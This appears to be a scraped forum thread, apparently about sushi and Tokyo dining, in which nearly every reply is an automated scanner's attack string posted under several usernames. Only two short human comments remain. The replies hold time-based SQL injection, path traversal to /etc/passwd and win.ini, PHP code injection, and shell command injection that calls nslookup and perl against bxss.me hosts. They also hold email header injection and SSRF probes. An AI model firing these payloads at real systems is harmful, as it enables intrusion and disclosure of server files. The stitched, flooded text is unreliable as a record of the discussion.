../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Shi
${@print(md5(31337))}
re: Shi
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Shi
${@print(md5(31337))}\
re: Shi
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Shi
'.print(md5(31337)).'
re: Shi
WEB-INF/web.xml
re: Shi
WEB-INF\web.xml
Glad to be able to support after all the interesting discussions and posts I've enjoyed here over the last few years! Looking forward to chatting here.
re: mirugai
QNPPgGrd
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
1*
re: mirugai
-1 OR 2+69-69-1=0+0+0+1
re: mirugai
-1 OR 3+69-69-1=0+0+0+1
re: mirugai
if(now()=sysdate(),sleep(15),0)
re: mirugai
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: mirugai
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: mirugai
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: mirugai
-1; waitfor delay '0:0:15' --
re: mirugai
-1); waitfor delay '0:0:15' --
re: mirugai
1 waitfor delay '0:0:15' --
re: mirugai
BR90Mi52'; waitfor delay '0:0:15' --
re: mirugai
-5 OR 547=(SELECT 547 FROM PG_SLEEP(15))--
re: mirugai
-5) OR 153=(SELECT 153 FROM PG_SLEEP(15))--
re: mirugai
-1)) OR 441=(SELECT 441 FROM PG_SLEEP(15))--
re: mirugai
DRyiZJ2U' OR 335=(SELECT 335 FROM PG_SLEEP(15))--
re: mirugai
esDrE7tQ') OR 131=(SELECT 131 FROM PG_SLEEP(15))--
re: mirugai
bxXCP0BK')) OR 564=(SELECT 564 FROM PG_SLEEP(15))--
re: mirugai
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: mirugai
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: mirugai
'||(select 1 from (select pg_sleep(15))x)||'
re: mirugai
''||(select 1 from (select pg_sleep(15))x)||''
re: mirugai
1'"
re: mirugai
@@F4LZs
re: mirugai
1CrKqEyB4YO
re: mirugai
response.write(9207850*9825102)
re: mirugai
%0abcc:074625.67-22328.67.c20d8.19990.2@bxss.me
re: mirugai
'+response.write(9207850*9825102)+'
re: mirugai
to@example.com>%0d%0abcc:074625.67-22329.67.c20d8.19990.2@bxss.me
re: mirugai
"+response.write(9207850*9825102)+"
re: mirugai
<esi:include src="http://bxss.me/rpb.png"/>
re: mirugai
${9999084+9999423}
re: mirugai
../../../../../../../../../../../../../../etc/passwd
re: mirugai
../../../../../../../../../../../../../../windows/win.ini
re: mirugai
file:///etc/passwd
re: mirugai
../../../../../../../../../../../../../../../proc/version
re: mirugai
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: mirugai
../../../../../../../../../../etc/passwd%00.jpg
re: mirugai
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: mirugai
)
re: mirugai
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: mirugai
!(()&&!|*|*|
re: mirugai
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: mirugai
'.gethostbyname(lc('hitfc'.'cokxxqos315f0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(80).chr(103).chr(66).'
re: mirugai
^(#$!@#$)(()))******
re: mirugai
/etc/passwd
re: mirugai
".gethostbyname(lc("hitzj"."aalvguon12bbd.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(71).chr(121).chr(71)."
re: mirugai
echo fglofw$()\ bbgagh\nz^xyu||a #' &echo fglofw$()\ bbgagh\nz^xyu||a #|" &echo fglofw$()\ bbgagh\nz^xyu||a #
re: mirugai
%2fetc%2fpasswd
re: mirugai
&echo phdzky$()\ bgpwnn\nz^xyu||a #' &echo phdzky$()\ bgpwnn\nz^xyu||a #|" &echo phdzky$()\ bgpwnn\nz^xyu||a #
re: mirugai
/.././.././.././.././.././.././.././../etc/./passwd%00
re: mirugai
|echo swbswc$()\ uagemw\nz^xyu||a #' |echo swbswc$()\ uagemw\nz^xyu||a #|" |echo swbswc$()\ uagemw\nz^xyu||a #
re: mirugai
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: mirugai
(nslookup hitmholdflzdhc4a00.bxss.me||perl -e "gethostbyname('hitmholdflzdhc4a00.bxss.me')")
re: mirugai
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: mirugai
$(nslookup hitwfslvoguni0a619.bxss.me||perl -e "gethostbyname('hitwfslvoguni0a619.bxss.me')")
re: mirugai
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: mirugai
&nslookup hitfebaxwpztobb09b.bxss.me&'\"`0&nslookup hitfebaxwpztobb09b.bxss.me&`'
re: mirugai
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: mirugai
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: mirugai
HttP://bxss.me/t/xss.html?%00
re: mirugai
&(nslookup hittowsqssbqa64217.bxss.me||perl -e "gethostbyname('hittowsqssbqa64217.bxss.me')")&'\"`0&(nslookup hittowsqssbqa64217.bxss.me||perl -e "gethostbyname('hittowsqssbqa64217.bxss.me')")&`'
re: mirugai
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: mirugai
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: mirugai
"+"A".concat(70-3).concat(22*4).concat(120).concat(66).concat(118).concat(69)+(require"socket"
Socket.gethostbyname("hitgy"+"gcnhqlgh215a3.bxss.me.")[3].to_s)+"
re: mirugai
bxss.me/t/xss.html?%00
re: mirugai
|(nslookup hitiyieycqope7437c.bxss.me||perl -e "gethostbyname('hitiyieycqope7437c.bxss.me')")
re: mirugai
Http://bxss.me/t/fit.txt
re: mirugai
file:///etc/passwd
re: mirugai
'+'A'.concat(70-3).concat(22*4).concat(117).concat(75).concat(118).concat(72)+(require'socket'
Socket.gethostbyname('hitwg'+'dyqruxked39ed.bxss.me.')[3].to_s)+'
re: mirugai
`(nslookup hitcuklgefphn9fb16.bxss.me||perl -e "gethostbyname('hitcuklgefphn9fb16.bxss.me')")`
re: mirugai
http://bxss.me/t/fit.txt%3F.jpg
re: mirugai
/\../\../\../\../\../\../\../etc/passwd
re: mirugai
;(nslookup hitwhkzalkrei0438b.bxss.me||perl -e "gethostbyname('hitwhkzalkrei0438b.bxss.me')")|(nslookup hitwhkzalkrei0438b.bxss.me||perl -e "gethostbyname('hitwhkzalkrei0438b.bxss.me')")&(nslookup hitwhkzalkrei0438b.bxss.me||perl -e "gethostbyname('hitwhkzalkrei0438b.bxss.me')")
re: mirugai
/etc/shells
re: mirugai
/WEB-INF/web.xml
re: mirugai
c:/windows/win.ini
re: mirugai
C:\WINDOWS\system32\drivers\etc\hosts
re: mirugai
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: mirugai
bxss.me
re: mirugai
../../../../../../../../../../windows/win.ini%00.jpg
re: mirugai
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: mirugai
/../../../../../../../../../../boot.ini
re: mirugai
';print(md5(31337));$a='
re: mirugai
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: mirugai
'"
re: mirugai
";print(md5(31337));$a="
re: mirugai
..\..\..\..\..\..\..\..\windows\win.ini
re: mirugai
<!--
re: mirugai
${@print(md5(31337))}
re: mirugai
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: mirugai
${@print(md5(31337))}\
re: mirugai
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: mirugai
'.print(md5(31337)).'
re: mirugai
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: mirugai
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: mirugai
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: mirugai
WEB-INF/web.xml
re: mirugai
WEB-INF\web.xml
Hi guys, nice to see some familiar faces in here. Thanks Saito-san for the massive guide which will make me FOMO into getting reservations at many places I've never heard of (lol). Anyone heading to Tokyo sometime soon? I'm going in November and having a long-awaited sushi bonanza after being deprived of great sushi for years! Super excited!
re: Just_Ingest
0zmgmc9c
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1 OR 2+382-382-1=0+0+0+1
re: Just_Ingest
-1 OR 3+382-382-1=0+0+0+1
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
8xt32FD1'; waitfor delay '0:0:15' --
re: Just_Ingest
-5 OR 240=(SELECT 240 FROM PG_SLEEP(15))--
re: Just_Ingest
-5) OR 181=(SELECT 181 FROM PG_SLEEP(15))--
re: Just_Ingest
-1)) OR 238=(SELECT 238 FROM PG_SLEEP(15))--
re: Just_Ingest
9xyBuX30' OR 324=(SELECT 324 FROM PG_SLEEP(15))--
re: Just_Ingest
mvFPjq1T') OR 615=(SELECT 615 FROM PG_SLEEP(15))--
re: Just_Ingest
cbfHtB58')) OR 93=(SELECT 93 FROM PG_SLEEP(15))--
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
@@2a2LQ
re: Just_Ingest
1VD9Q509rO
re: Just_Ingest
%0abcc:074625.67-22317.67.8afc5.19990.2@bxss.me
re: Just_Ingest
response.write(9743929*9996991)
re: Just_Ingest
to@example.com>%0d%0abcc:074625.67-22318.67.8afc5.19990.2@bxss.me
re: Just_Ingest
'+response.write(9743929*9996991)+'
re: Just_Ingest
"+response.write(9743929*9996991)+"
re: Just_Ingest
<esi:include src="http://bxss.me/rpb.png"/>
re: Just_Ingest
${9999131+9999784}
re: Just_Ingest
../../../../../../../../../../../../../../etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../windows/win.ini
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../../proc/version
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Just_Ingest
../../../../../../../../../../etc/passwd%00.jpg
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Just_Ingest
)
re: Just_Ingest
